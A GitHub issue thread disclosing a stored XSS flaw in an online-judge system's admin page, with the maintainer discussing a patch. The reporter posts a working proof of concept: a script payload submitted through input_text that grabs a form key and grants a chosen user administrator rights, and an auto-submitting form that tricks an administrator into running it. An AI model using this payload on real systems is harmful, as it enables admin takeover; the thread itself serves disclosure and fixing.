Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS Vulnerability in /admin/problem_judge.php #866

Closed
rolemee opened this issue Sep 29, 2022 · 6 comments · Fixed by #868
Closed

XSS Vulnerability in /admin/problem_judge.php #866

rolemee opened this issue Sep 29, 2022 · 6 comments · Fixed by #868

Comments

@rolemee
Copy link

rolemee commented Sep 29, 2022

描述问题
XSS Vulnerability exists in

echo $row['input_text']."\n";

如何复现
Steps to reproduce the behavior:

  1. POST text with xss script to submit.php
    for example:
id=-1000&language=1&source=asdasdasdasdasd&input_text=<script src="/template/bs3/jquery.min.js"></script><script>$.get("/admin/privilege_add.php").done(function(data){
    re=/name="postkey" value="([\w]%2B?)"/g;
    $.post("/admin/privilege_add.php",{"postkey":re.exec(data)[1],"user_id":"username","rightstr":"administrator","valuestr":"true"
                                  ,"do":"do","do":"do","csrf":"tV8EG8W5AsFY0JCKoBStoHC2v30NrDe5"}).done(function (data) {console.log(data)})
})
</script>

Then you can get a sid.
image

  1. Send malicious links to administrators
    example:
<body>
<script type="text/javascript">
    function post(URL, PARAMS) {
    var temp = document.createElement("form");
    temp.action = URL;
    temp.method = "post";
    temp.style.display = "none";
    for (var x in PARAMS) {
        var opt = document.createElement("textarea");
        opt.name = x;
        opt.value = PARAMS[x];
        temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    return temp;
}
post("http://192.168.0.25:8080/admin/problem_judge.php",{"sid":"1018","pid":"1000","result":"4","time":"500","memory":"1024","sim":"100","simid":"0","filename":"1000%2Ftest.in","gettestdatalist":"do","getcustominput":"1"})

</script>
</body>

image

@zhblue
Copy link
Owner

zhblue commented Sep 29, 2022

thank you very much for reporting this
will this patch work around ?
c15d370

@rolemee
Copy link
Author

rolemee commented Sep 29, 2022

Although repairing in this way can prevent xss, it will cause some business problems. I recommend repairing like #867

@zhblue
Copy link
Owner

zhblue commented Sep 29, 2022

no , this will not cause business problems , because these input should be treat as TEXT from the beginning .
only the HTTP_JUDGER will use it as a API port for downloading TEXT input for once only test running.

@zhblue
Copy link
Owner

zhblue commented Sep 29, 2022

Still, it's a marvelous work you've done !
Thank you very much for helping !

@rolemee
Copy link
Author

rolemee commented Sep 29, 2022

I made a mistake, this change can defend xss。

@rolemee
Copy link
Author

rolemee commented Sep 30, 2022

@zhblue
However, other files will also have xss vulnerabilities.
For example:

}else if(isset($_POST['getsolution'])){
$sid=intval($_POST['sid']);
$sql="SELECT source FROM source_code WHERE solution_id=? ";
$result=pdo_query($sql,$sid);
if ( $row=$result[0]){
echo $row['source']."\n";
}

}else if(isset($_POST['getcustominput'])){
$sid=intval($_POST['sid']);
$sql="SELECT input_text FROM custominput WHERE solution_id=? ";
$result=pdo_query($sql,$sid);
if ( $row=$result[0]){
echo $row['input_text']."\n";
}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants